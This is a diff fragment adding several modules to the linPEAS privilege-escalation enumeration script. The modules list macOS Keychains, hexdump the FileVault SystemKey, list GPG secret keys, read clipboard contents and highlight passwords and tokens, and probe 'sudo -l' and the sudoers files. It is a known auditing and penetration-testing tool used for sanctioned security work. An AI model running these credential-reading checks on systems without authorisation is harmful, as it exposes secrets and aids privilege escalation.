      echo "- User: $(basename "$user_home")" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
      ls -la "${user_home}Library/Keychains/" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g"
    fi
  done
  echo ""
 fi
--- a/linPEAS/builder/linpeas_parts/6_users_information/4_Macos_systemkey.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/4_Macos_systemkey.sh
@ -0,0 +1,28 @@
 # Title: Users Information - MacOS SystemKey
 # ID: UG_Macos_systemkey
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: Get macOS SystemKey information (used for FileVault encryption)
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title
 # Global Variables: $MACPEAS
 # Initial Functions:
 # Generated Global Variables:
 # Fat linpeas: 0
 # Small linpeas: 0
 if [ "$MACPEAS" ];then
  print_2title "SystemKey"
  echo "The SystemKey is used by FileVault to encrypt/decrypt the volume. If you can read it, you might be able to decrypt the disk."
  echo -e "\nSystemKey file permissions:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
  ls -l /var/db/SystemKey 2>/dev/null | sed -${E} "s,.*,${SED_RED_YELLOW},g"
  if [ -r "/var/db/SystemKey" ]; then
    echo -e "\nWARNING: You can read /var/db/SystemKey!" | sed -${E} "s,.*,${SED_RED},g"
    echo "SystemKey content (first 24 bytes after header):" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
    hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey | sed -${E} "s,.*,${SED_RED_YELLOW},g"
  fi
  echo ""
 fi
--- a/linPEAS/builder/linpeas_parts/6_users_information/5_Pgp_keys.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/5_Pgp_keys.sh
@ -0,0 +1,49 @@
 # Title: Users Information - PGP keys
 # ID: UG_Pgp_keys
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: Check for PGP keys and related files that might contain sensitive information
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: echo_not_found, print_2title, print_info
 # Global Variables: $HOME
 # Initial Functions:
 # Generated Global Variables: $pgp_file
 # Fat linpeas: 0
 # Small linpeas: 1
 print_2title "PGP Keys and Related Files"
 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#pgp-keys"
 # Check for GPG
 echo "GPG:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
 if command -v gpg >/dev/null 2>&1; then
  echo "GPG is installed, listing keys:"
  gpg --list-keys 2>/dev/null | sed -${E} "s,.*,${SED_RED},g"
  # Check for private keys
  gpg --list-secret-keys 2>/dev/null | sed -${E} "s,.*,${SED_RED_YELLOW},g"
 else
  echo_not_found "gpg"
 fi
 # Check for NetPGP
 echo -e "\nNetPGP:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
 if command -v netpgpkeys >/dev/null 2>&1; then
  echo "NetPGP is installed" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
  netpgpkeys --list-keys 2>/dev/null | sed -${E} "s,.*,${SED_RED},g"
 else
  echo_not_found "netpgpkeys"
 fi
 # Check for common PGP files
 echo -e "\nPGP Related Files:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
 for pgp_file in "$HOME/.gnupg" "$HOME/.pgp" "$HOME/.openpgp" "$HOME/.ssh/gpg-agent.conf" "$HOME/.config/gpg"; do
  if [ -e "$pgp_file" ]; then
    echo "Found: $pgp_file"
    if [ -d "$pgp_file" ]; then
      ls -la "$pgp_file" 2>/dev/null
    fi
  fi
 done
 echo ""
--- a/linPEAS/builder/linpeas_parts/6_users_information/6_Clipboard_highlighted_text.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/6_Clipboard_highlighted_text.sh
@ -0,0 +1,53 @@
 # Title: Users Information - Clipboard and highlighted text
 # ID: UG_Clipboard_highlighted_text
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: Check clipboard and highlighted text for sensitive information
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: echo_not_found, print_2title, print_info
 # Global Variables: $DEBUG, $pwd_inside_history
 # Initial Functions:
 # Generated Global Variables: $content
 # Fat linpeas: 0
 # Small linpeas: 1
 if [ "$(command -v xclip 2>/dev/null || echo -n '')" ] || [ "$(command -v xsel 2>/dev/null || echo -n '')" ] || [ "$(command -v pbpaste 2>/dev/null || echo -n '')" ] || [ "$(command -v wl-paste 2>/dev/null || echo -n '')" ] || [ "$DEBUG" ]; then
  print_2title "Clipboard and Highlighted Text"
  print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#clipboard"
  # Function to check clipboard content
  check_clipboard() {
    local content="$1"
    if [ -n "$content" ]; then
      echo "$content" | sed -${E} "s,$pwd_inside_history,${SED_RED},g" | sed -${E} "s,(password|passwd|pwd).*=.*,${SED_RED},g" | sed -${E} "s,(token|key|secret).*=.*,${SED_RED},g"
    fi
  }
  # Check different clipboard tools
  if [ "$(command -v xclip 2>/dev/null || echo -n '')" ]; then
    echo "Using xclip:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
    echo "Clipboard:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
    check_clipboard "$(xclip -o -selection clipboard 2>/dev/null)"
    echo "Highlighted text:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
    check_clipboard "$(xclip -o 2>/dev/null)"
  elif [ "$(command -v xsel 2>/dev/null || echo -n '')" ]; then
    echo "Using xsel:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
    echo "Clipboard:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
    check_clipboard "$(xsel -ob 2>/dev/null)"
    echo "Highlighted text:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
    check_clipboard "$(xsel -o 2>/dev/null)"
  elif [ "$(command -v pbpaste 2>/dev/null || echo -n '')" ]; then
    echo "Using pbpaste:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
    echo "Clipboard:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
    check_clipboard "$(pbpaste 2>/dev/null)"
  elif [ "$(command -v wl-paste 2>/dev/null || echo -n '')" ]; then
    echo "Using wl-paste:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
    echo "Clipboard:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
    check_clipboard "$(wl-paste 2>/dev/null)"
  else
    echo_not_found "clipboard tools (xclip, xsel, pbpaste, wl-paste)"
  fi
  echo ""
 fi
--- a/linPEAS/builder/linpeas_parts/6_users_information/7_Sudo_l.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/7_Sudo_l.sh
@ -0,0 +1,32 @@
 # Title: Users Information - Sudo -l
 # ID: UG_Sudo_l
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: echo_not_found, print_2title, print_info
 # Global Variables:$IAMROOT, $PASSWORD, $sudoB, $sudoG, $sudoVB1, $sudoVB2 
 # Initial Functions:
 # Generated Global Variables:
 # Fat linpeas: 0
 # Small linpeas: 1
 print_2title "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d"
 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid"
 (echo '' | timeout 1 sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,\!root,${SED_RED},") 2>/dev/null || echo_not_found "sudo"
 if [ "$PASSWORD" ]; then
  (echo "$PASSWORD" | timeout 1 sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g") 2>/dev/null  || echo_not_found "sudo"
 fi
 ( grep -Iv "^$" cat /etc/sudoers | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" ) 2>/dev/null  || echo_not_found "/etc/sudoers"
 if ! [ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then
  echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW},"
 fi
 for f in /etc/sudoers.d/*; do
  if [ -r "$f" ]; then
    echo "Sudoers file: $f is readable" | sed -${E} "s,.*,${SED_RED},g"
    grep -Iv "^$" "$f" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g"
  fi
 done
 echo ""
--- a/Show More
+++ b/Show More